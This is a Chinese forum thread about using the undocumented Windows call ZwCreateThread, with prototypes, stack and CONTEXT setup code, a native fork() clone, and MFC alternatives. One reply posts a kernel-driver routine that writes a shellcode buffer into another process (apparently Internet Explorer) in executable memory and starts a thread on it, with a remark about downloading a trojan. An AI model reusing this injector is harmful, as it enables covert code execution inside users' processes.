200分求一个函数的用法--ZwCreateThread

Kerrie 2008-12-11 04:45:58
问题很简单,就是如何用ZwCreateThread创建一个线程,线程函数带一个参数,如
// Thread entry the poster wants to start through ZwCreateThread.
// lpVoid: the single argument the caller intends to pass; it is cast to a
//         C*** (a placeholder class name in the original post) and not used.
// Returns 0 as the thread exit code after showing a message box.
UINT ThreadProc(LPVOID lpVoid)
{
    C*** pObject = static_cast<C***>(lpVoid);
    (void)pObject; // only demonstrates that the argument arrives

    MessageBox(NULL, "F**K ZwCreateThread", NULL, MB_OK);
    return 0;
}

见鬼的微软,一大堆参数怎么写也写不对,调用的结果一律是 CPU 占用 100% 然后挂死
tttbot 2010-01-28
我成功调用了。开始我也遇到 CPU 占用 100% 的情况,后来跟踪调试发现是线程函数返回的问题:ZwCreateThread 只按你给的 CONTEXT 启动线程,新线程的栈上并没有像 CreateThread 那样由系统压入一个返回地址,线程函数执行 ret 时跳到的是栈上的垃圾数据。我在线程代码末尾加了一个 ExitThread()(直接调用 ZwTerminateThread 也可以),问题解决。也可以用 TerminateThread(),但它不会执行正常的线程退出清理,应优先用 ExitThread()/ZwTerminateThread();关键是线程函数不能靠 ret 自己返回。
scq2099yt 2008-12-12
// Native (undocumented) thread-creation system call, as used by the replies
// on this page. The caller supplies everything CreateThread would otherwise
// build for it:
//   ThreadHandle     - receives the new thread handle
//   DesiredAccess    - e.g. THREAD_ALL_ACCESS
//   ObjectAttributes - optional; NULL/0 in most replies here
//   ProcessHandle    - process the thread is created in (may be another process)
//   ClientId         - receives the new thread's process/thread ids
//   ThreadContext    - complete initial register state (Eip = entry point,
//                      Esp = stack top, segment registers, flags)
//   InitialTeb       - user stack bounds (the replies pass a USER_STACK here)
//   CreateSuspended  - TRUE to start suspended; resume later with ZwResumeThread
NTSYSAPI
NTSTATUS
NTAPI
NtCreateThread(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
OUT PCLIENT_ID ClientId,
IN PCONTEXT ThreadContext,
IN PINITIAL_TEB InitialTeb,
IN BOOLEAN CreateSuspended );
roadblossom 2008-12-12
study!
yaozhu88 2008-12-12
模仿 NTDLL.DLL 里面的做法行不行?先传入系统服务号,准备好参数栈,再执行 INT 0x2E 中断进入内核(注意系统服务号随 Windows 版本变化)。
cnzdgs 2008-12-11
参数可以通过寄存器或者栈来传递:如果线程函数使用 __cdecl 或 __stdcall 约定,则参数要在线程运行前写到新线程的栈上(Esp 之上);线程函数最后调用 ZwTerminateThread 退出,不能直接 ret 返回。
Kerrie 2008-12-11
to KeSummer & wmpkumse:感谢两位的回复,不过还是没有看到参数的处理。

另外,楼上几位的代码原理都一样:新线程的栈上没有压入返回地址(eax 等寄存器也都是自己填的),线程主函数一返回程序就会挂掉。有谁成功调用过 ZwCreateThread?
wmpkumse 2008-12-11
// 4 KiB placeholder for a user-mode (ring 3) payload; the bytes are not shown
// on this page. What the injected thread does is entirely whatever fills this array.
unsigned char shellcode[1024*4]={...}// a ring-3 shellcode; use your imagination — e.g. one that downloads a trojan from a URL...
// Kernel-mode helper (ExAllocatePool/ExFreePool below mark this as driver
// code) that starts a thread inside another process at an arbitrary
// EntryPoint with a hand-built CONTEXT and a hand-built user stack — i.e.
// remote code injection from ring 0. It was posted as an example of the
// ZwCreateThread argument set; treat it as offensive tooling, not as a
// pattern to copy.
//
// hProcess:      handle to the target process (the caller below opens it with PROCESS_ALL_ACCESS)
// EntryPoint:    address in the target where the new thread starts (becomes Eip)
// RegEax/RegEbx: initial Eax/Ebx of the new thread (the caller passes 0, 0)
// Returns the new thread handle on success, NULL on any failure.
HANDLE CreateUserThread(
IN HANDLE hProcess,
IN PVOID EntryPoint,
IN ULONG RegEax,
IN ULONG RegEbx
)
{
USER_STACK stack = {0};
CONTEXT context; // NOTE(review): not zero-initialised; see the register setup below
NTSTATUS status;
ULONG AllocSize = PAGE_SIZE * 2;
PVOID p;
ULONG OldProtect;
HANDLE hThread = (HANDLE)0;
PCLIENT_ID cid;

// Reserve two pages in the target for the new thread's stack at a
// system-chosen address (ExpandableStackBottom starts out NULL).
status = ZwAllocateVirtualMemory(hProcess,
&stack.ExpandableStackBottom,
0,
&AllocSize,
MEM_RESERVE,
PAGE_READWRITE);

if (NT_SUCCESS(status))
{
// Stack top is one page above the reservation bottom. Limit == Base tells
// the TEB the committed stack is empty — TODO confirm that is intended (the
// user-mode reply further down sets Limit one page below Base).
stack.ExpandableStackBase = (PUCHAR)stack.ExpandableStackBottom + PAGE_SIZE;
stack.ExpandableStackLimit = stack.ExpandableStackBase;

AllocSize = PAGE_SIZE;
// Base - PAGE_SIZE == ExpandableStackBottom, i.e. p is the lower of the two reserved pages.
p = (PCHAR)stack.ExpandableStackBase - AllocSize;

// Commit that single page.
status = ZwAllocateVirtualMemory(hProcess,
&p,
0,
&AllocSize,
MEM_COMMIT,
PAGE_READWRITE);

if (NT_SUCCESS(status))
{
AllocSize = PAGE_SIZE;

// NOTE(review): this turns the ONLY committed page into a guard page. Esp
// (set to Base - 4 below) lies inside it, so the new thread's very first
// stack access trips the guard. Compare the user-mode reply further down,
// which commits 4096 + PAGE_SIZE and guards only the lowest page.
status = ZwProtectVirtualMemory(hProcess,
&p,
&AllocSize,
PAGE_READWRITE | PAGE_GUARD,
&OldProtect);

if (NT_SUCCESS(status))
{
// NOTE(review): the allocation is never checked for NULL before being
// handed to ZwCreateThread; a stack-local CLIENT_ID would do here.
cid = ExAllocatePool(PagedPool, sizeof(CLIENT_ID));

context.ContextFlags = CONTEXT_FULL;

// Hard-coded x86 selector values instead of a CONTEXT captured from a live
// thread (the other replies on this page use ZwGetContextThread for that).
// Ecx/Edx/Esi/Edi/Ebp are covered by CONTEXT_FULL but never assigned, so the
// new thread starts with whatever this kernel stack frame happened to hold.
context.SegCs = 0x18;
context.SegFs = 0x38;
context.SegEs = 0x20;
context.SegDs = 0x20;
context.SegSs = 0x20;
context.SegGs = 0x00;
// 0x3000 is the IOPL field only; IF (0x200) is not set. Presumably the
// kernel sanitises a caller-supplied user-mode EFlags — verify, don't rely on it.
context.EFlags = 0x3000;

// Nothing is pushed onto the new stack: no return address and no argument,
// so the code at EntryPoint must terminate the thread itself rather than `ret`.
context.Esp = (ULONG)stack.ExpandableStackBase - 4;
context.Eip = (ULONG)EntryPoint;
context.Eax = RegEax;
context.Ebx = RegEbx;

// The thread starts running immediately (CreateSuspended == FALSE).
status = ZwCreateThread(&hThread,
THREAD_ALL_ACCESS,
NULL,
hProcess,
cid,
&context,
&stack,
FALSE);

// cid is an OUT parameter written before ZwCreateThread returns; the ids
// are simply discarded here.
ExFreePool(cid);


if (NT_SUCCESS(status)) return hThread;
}

// Failure after the commit: p == ExpandableStackBottom, so this MEM_RELEASE
// with size 0 frees the whole two-page reservation; the MEM_DECOMMIT below
// then acts on an already-released region.
AllocSize = 0;

ZwFreeVirtualMemory(hProcess,
&p,
&AllocSize,
MEM_RELEASE);
}

// Failure right after the reserve: only decommitted, never released — the
// two-page reservation is left behind in the target.
AllocSize = PAGE_SIZE * 2;

ZwFreeVirtualMemory(hProcess,
&stack.ExpandableStackBottom,
&AllocSize,
MEM_DECOMMIT);
return NULL;
}
// Driver-side injector: opens a process by name, allocates a writable AND
// executable region in it, copies `shellcode` there and starts a thread on
// it through CreateUserThread. Returns the new thread handle, or NULL if any
// step fails.
HANDLE WriteShellToProcess()
{
HANDLE hProcess;
DWORD pid; // NOTE(review): never initialised; used even if the lookup below fails
CLIENT_ID ClientId;
NTSTATUS stat;
OBJECT_ATTRIBUTES obj;
PVOID EntryPoint=0;
ULONG AllocSize = PAGE_SIZE * 10;
// getprocessptr is not shown anywhere on this page and its result is ignored.
// The name as written is "iexplorer.exe"; Internet Explorer's binary is
// iexplore.exe — TODO confirm which process is meant.
getprocessptr(0,L"iexplorer.exe",&pid);
ClientId.UniqueProcess = (HANDLE)pid;
ClientId.UniqueThread = 0;
InitializeObjectAttributes(&obj,
NULL,
OBJ_CASE_INSENSITIVE,
NULL,
NULL);
// Full access to the target by client id. NOTE(review): hProcess is never
// closed on any path below.
stat = ZwOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&obj,&ClientId);
if(NT_SUCCESS(stat))
{
// Ten RWX pages at a system-chosen address in the target.
stat = ZwAllocateVirtualMemory(hProcess,
&EntryPoint,
0,
&AllocSize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if(NT_SUCCESS(stat))
{
// Copies the whole 4 KiB array; the bytes-written out-parameter is not requested.
stat = ZwWriteVirtualMemory(hProcess, EntryPoint, shellcode, sizeof(shellcode), 0);
if(NT_SUCCESS(stat))
{
// Eax/Ebx of the new thread are 0; nothing else is passed to the payload.
return CreateUserThread(hProcess,EntryPoint,0,0);
}
}
// NOTE(review): if the write (or the thread creation) fails, the RWX region
// stays mapped in the target.
}
return NULL;

}
KeSummer 2008-12-11
看《Windows NT/2000 Native API Reference》这本书所附带的代码,
或者 WRK 或 ReactOS 的源码。下面是一个完整示例:用 ZwCreateProcess + ZwCreateThread 把当前进程克隆出来(fork),新线程的 CONTEXT 直接拷贝自当前线程、只改 Eip。


#include "ntdll.h"
#include <stdio.h>

// Declares the undocumented ntdll export used by InformCsrss() below, with the
// four-argument shape that call uses (message, unused, opcode, size). The other
// NT:: names come from "ntdll.h" — presumably the header shipped with the book
// mentioned above, not a DDK file.
namespace NT {
extern "C" {

NTSTATUS
NTAPI
CsrClientCallServer(
IN PVOID Message,
IN PVOID,
IN ULONG Opcode,
IN ULONG Size
);

}
}

// Marks every handle owned by the calling process as inheritable, so a child
// created with handle inheritance (see fork() below) receives all of them —
// including handles the caller never meant to share.
// Walks the system-wide handle table from SystemHandleInformation, doubling
// the buffer until the query stops returning STATUS_INFO_LENGTH_MISMATCH.
VOID InheritAll()
{
    // The first ULONG of the result is the entry count; entries follow it.
    ULONG words = 0x1000;
    PULONG table = new ULONG[words];

    while (NT::ZwQuerySystemInformation(NT::SystemHandleInformation, table, words * sizeof *table, 0)
           == STATUS_INFO_LENGTH_MISMATCH)
    {
        delete [] table;
        words *= 2;
        table = new ULONG[words];
    }
    // NOTE(review): any other failure status is not detected; the count and
    // entries below would then be whatever the buffer happens to contain.

    NT::PSYSTEM_HANDLE_INFORMATION entries = NT::PSYSTEM_HANDLE_INFORMATION(table + 1);
    const ULONG total = *table;
    const ULONG self = GetCurrentProcessId();

    for (ULONG idx = 0; idx < total; idx++)
    {
        if (entries[idx].ProcessId != self)
            continue;
        SetHandleInformation(HANDLE(entries[idx].Handle), HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);
    }

    delete [] table;
}

// Tells csrss (the Win32 subsystem server) about the new process and thread
// through the CsrClientCallServer export declared above — a step CreateProcess
// normally performs on the caller's behalf. The message layout, the opcode
// 0x10000 and the size 0x24 are undocumented values reproduced as-is from the
// example; the Unknown* fields are left zero.
VOID InformCsrss(HANDLE hProcess, HANDLE hThread, ULONG pid, ULONG tid)
{
struct CSRSS_MESSAGE {
ULONG Unknown1;
ULONG Opcode;
ULONG Status;
ULONG Unknown2;
};

// PROCESS_INFORMATION is filled positionally: hProcess, hThread, dwProcessId, dwThreadId.
struct {
NT::PORT_MESSAGE PortMessage;
CSRSS_MESSAGE CsrssMessage;
PROCESS_INFORMATION ProcessInformation;
NT::CLIENT_ID Debugger;
ULONG CreationFlags;
ULONG VdmInfo[2];
} csrmsg = {{0}, {0}, {hProcess, hThread, pid, tid}, {0}, 0, {0}};

NT::CsrClientCallServer(&csrmsg, 0, 0x10000, 0x24);
}

// Entry point of the cloned process's first thread. `naked`: no compiler
// prologue/epilogue, because the thread starts with the Esp/Ebp that fork()
// captured from its own frame (see the CONTEXT snapshot there).
__declspec(naked) int child()
{
typedef BOOL (WINAPI *CsrpConnectToServer)(PWSTR);

// Reconnect the clone to csrss. The address is a hard-coded location inside
// one specific ntdll build; the two commented-out values are presumably the
// same routine in other builds. It has to be adjusted per ntdll version.
// CsrpConnectToServer(0x77F68CC0)(L"\\Windows");
// CsrpConnectToServer(0x77F8F65D)(L"\\Windows");
CsrpConnectToServer(0x77F922F5)(L"\\Windows");

// Return 0 through fork()'s frame: eax = 0, then a standard epilogue on the
// inherited Ebp, so in the clone fork() appears to return 0 to its caller.
__asm mov eax, 0
__asm mov esp, ebp
__asm pop ebp
__asm ret
}


#pragma optimize("y", off) // disable frame pointer omission

// fork() for Win32 built on the native API: creates a new process with the
// current one as parent (ZwCreateProcess with no section), then starts one
// thread in it whose registers are a copy of this thread's with Eip pointed
// at child(). 32-bit x86 only (pointers are cast to ULONG; child() is naked).
// NOTE(review): the return value of every Zw* call is ignored; on the first
// failure hProcess/hThread are used uninitialised.
// Returns the child's pid in the parent; in the clone, child() unwinds this
// frame and makes the call return 0 instead.
int fork()
{
HANDLE hProcess, hThread;

// Every handle in this process becomes inheritable so the clone sees them all.
InheritAll();

NT::OBJECT_ATTRIBUTES oa = {sizeof oa};

// Parent = this process, InheritHandles = TRUE, no section/debug/exception ports.
NT::ZwCreateProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, NtCurrentProcess(), TRUE, 0, 0, 0);

NT::CONTEXT context = {CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS | CONTEXT_FLOATING_POINT};

// Snapshot of this thread's registers; only Eip is changed afterwards. Esp/Ebp
// therefore point at this very frame, which is why frame-pointer omission is
// disabled around fork() (see the #pragma above).
NT::ZwGetContextThread(NtCurrentThread(), &context);

context.Eip = ULONG(child);

MEMORY_BASIC_INFORMATION mbi;

// Describe the region holding the current stack so USER_STACK can reuse the
// same addresses in the clone.
NT::ZwQueryVirtualMemory(NtCurrentProcess(), PVOID(context.Esp),
NT::MemoryBasicInformation, &mbi, sizeof mbi, 0);

NT::USER_STACK stack = {0, 0, PCHAR(mbi.BaseAddress) + mbi.RegionSize,
mbi.BaseAddress, mbi.AllocationBase};

NT::CLIENT_ID cid;

// Created suspended; resumed only after csrss has been told about it.
NT::ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &oa,
hProcess, &cid, &context, &stack, TRUE);

NT::THREAD_BASIC_INFORMATION tbi;

NT::ZwQueryInformationThread(NtCurrentThread(), NT::ThreadBasicInformation,
&tbi, sizeof tbi, 0);

NT::PNT_TIB tib = tbi.TebBaseAddress;

NT::ZwQueryInformationThread(hThread, NT::ThreadBasicInformation, &tbi, sizeof tbi, 0);

// Copy this thread's SEH chain head into the new thread's TEB so the clone's
// exception handling starts from the same frame list.
NT::ZwWriteVirtualMemory(hProcess, tbi.TebBaseAddress,
&tib->ExceptionList, sizeof tib->ExceptionList, 0);

InformCsrss(hProcess, hThread, ULONG(cid.UniqueProcess), ULONG(cid.UniqueThread));

NT::ZwResumeThread(hThread, 0);

NT::ZwClose(hThread);
NT::ZwClose(hProcess);

return int(cid.UniqueProcess);
}

#pragma optimize("", on)


// Demo driver: fork, then both sides beep and print what fork() returned
// (the child's pid in the parent, 0 in the clone — see child()).
int main()
{
    const int result = fork();
    Sleep(result * 10);   // parent idles pid*10 ms; the clone (result 0) does not wait
    Beep(100, 100);
    printf("%d\n", result);
    return 0;
}

Kerrie 2008-12-11
to jingzhongrong : 参数如何传递?
jingzhongrong 2008-12-11
// Posted answer: a user-mode ZwCreateThread call sequence that builds the new
// thread's stack in the target by hand and uses this thread's CONTEXT as the
// template. Fragment: hThread, startaddress and dwpid are not declared here,
// the thread is left suspended, and no argument is ever written to the new
// stack — so it does not yet answer the original question about a parameter.
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,0,dwpid);//dwpid is the id of some system process (per the poster)

USER_STACK stack = {0};

DWORD ret;
ULONG n = 1024*1024;//1MB
// Reserve 1 MiB for the stack at a system-chosen address in the target.
ret=ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,MEM_RESERVE, PAGE_READWRITE);

// Stack top = end of the reservation; committed limit one page below it.
stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom) +1024*1024;
stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase) - 4096;
n = 4096 + PAGE_SIZE;

// Commit the top two pages ...
PVOID p = PCHAR(stack.ExpandableStackBase) - n;
ret=ZwAllocateVirtualMemory(hProcess, &p, 0, &n, MEM_COMMIT, PAGE_READWRITE);

// ... and make only the lower one the guard page, leaving one usable
// committed page under Esp (unlike the driver example above, which guards
// its only committed page).
ULONG x; n = PAGE_SIZE;
ret=ZwProtectVirtualMemory(hProcess, &p, &n, PAGE_READWRITE | PAGE_GUARD, &x);

CONTEXT context = {CONTEXT_FULL};

// Take this thread's registers (segment selectors, flags) as the template
// instead of hard-coding them.
ret=ZwGetContextThread(GetCurrentThread(),&context);

// Esp 2 KiB below the top. Nothing is written there (no return address, no
// argument), so startaddress must terminate the thread itself. A parameter
// would have to be written into this stack (it lives in hProcess, so e.g. via
// ZwWriteVirtualMemory) before the thread is resumed.
context.Esp = ULONG(stack.ExpandableStackBase) - 2048;
context.Eip = ULONG(startaddress);

CLIENT_ID cid;

// Created suspended (TRUE); no ZwResumeThread is shown. `ret` is a DWORD
// holding an NTSTATUS, so any non-zero value (including informational or
// warning statuses) is reported as a failure.
ret=ZwCreateThread(&hThread, THREAD_ALL_ACCESS, 0, hProcess, &cid, &context, &stack, TRUE);
if(ret) MessageBox(0,"ZwCreateThread","",0);
ivan_08 2008-12-11
不会,帮顶
Kerrie 2008-12-11
to oyljerry: BaseCreateStack是哪里定义的,我的ddk版本不够?
oyljerry 2008-12-11
// How kernel32's CreateRemoteThread drives NtCreateThread, posted as a
// reference. The listing is cut off after the NtCreateThread call: the
// closing brace and the resume/return part are not shown. BaseCreateStack,
// BaseInitializeContext and BaseFormatObjectAttributes appear to be kernel32's
// own internal helpers (not DDK exports), which is what the follow-up question
// below runs into.
HANDLE APIENTRY CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
{
NTSTATUS Status;
OBJECT_ATTRIBUTES Obja;
POBJECT_ATTRIBUTES pObja;
HANDLE Handle;
CONTEXT ThreadContext;
INITIAL_TEB InitialTeb;
CLIENT_ID ClientId;

// Allocate a stack for this thread
// NOTE(review): Status is not checked in this fragment.
Status = BaseCreateStack(hProcess, dwStackSize, 0L, &InitialTeb );

// Create an initial context
// This call receives lpParameter, lpStartAddress and the stack base — it is
// the step that does the parameter passing the original question asks about
// (its body is not on this page).
BaseInitializeContext( &ThreadContext, lpParameter, (PVOID)lpStartAddress, InitialTeb.StackBase, BaseContextTypeThread);

pObja = BaseFormatObjectAttributes(&Obja, lpThreadAttributes, NULL);

// Always created suspended here; the missing remainder presumably resumes it
// unless dwCreationFlags asks for CREATE_SUSPENDED.
Status = NtCreateThread( &Handle, THREAD_ALL_ACCESS, pObja, hProcess, &ClientId, &ThreadContext, &InitialTeb, TRUE );
oyljerry 2008-12-11
// Prototype of the native thread-creation call; the kernel32 fragment above
// shows how each argument is filled in (stack via BaseCreateStack into
// InitialTeb, registers/parameter via BaseInitializeContext into ThreadContext,
// CreateSuspended = TRUE).
NTSYSAPI
NTSTATUS
NTAPI
NtCreateThread(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
OUT PCLIENT_ID ClientId,
IN PCONTEXT ThreadContext,
IN PINITIAL_TEB InitialTeb,
IN BOOLEAN CreateSuspended );
cnzdgs 2008-12-11
用ZwCreateThread是很麻烦的,为何不用CreateThread?
康斯坦汀 2008-12-11
http://www.codeproject.com/KB/threads/cthread.aspx

Kerrie 2008-12-11
AfxBeginThread/CreateThread/_beginThread由于项目自身原因无法使用,只能采用ZwCreateThread/NtCreateThread
康斯坦汀 2008-12-11
用CThread类,我一直用,简单、好用。
oyljerry 2008-12-11
ZwCreateThread 是底层的 Native API(由 ntdll/内核导出,MSDN 没有文档),不是面向应用程序的接口
你创建线程,可以用_beginthreadex,AfxBeginThread等来创建..
xiang_yun 2008-12-11
楼主的 ZwCreateThread 在 MSDN 里面都找不到(它是未公开的 Native API)
如果只是创建线程,可以用 Win32 的 CreateThread,或者 MFC 的 AfxBeginThread(注意 AfxBeginThread 是 MFC 函数,不是 Windows API):

// MFC worker-thread entry (AfxBeginThread signature).
// pParam: expected to be a CMyObject* supplied by the caller.
// Returns 1 if the argument is null or not a CMyObject, else 0 on completion.
UINT MyThreadProc( LPVOID pParam )
{
    CMyObject* pObject = static_cast<CMyObject*>(pParam);

    // Validate the argument before touching it (null check first, so the
    // IsKindOf call is only reached on a non-null pointer).
    const bool valid = pObject != NULL && pObject->IsKindOf(RUNTIME_CLASS(CMyObject));
    if (!valid)
        return 1; // if pObject is not valid

    // do something with 'pObject'

    return 0; // thread completed successfully
}

// inside a different function in the program
.
.
.
// Allocate the argument object and hand it to the worker thread. Who deletes
// pNewObject afterwards is not shown here (the thread function's body above is elided).
pNewObject = new CMyObject;
AfxBeginThread(MyThreadProc, pNewObject);
.
.
.
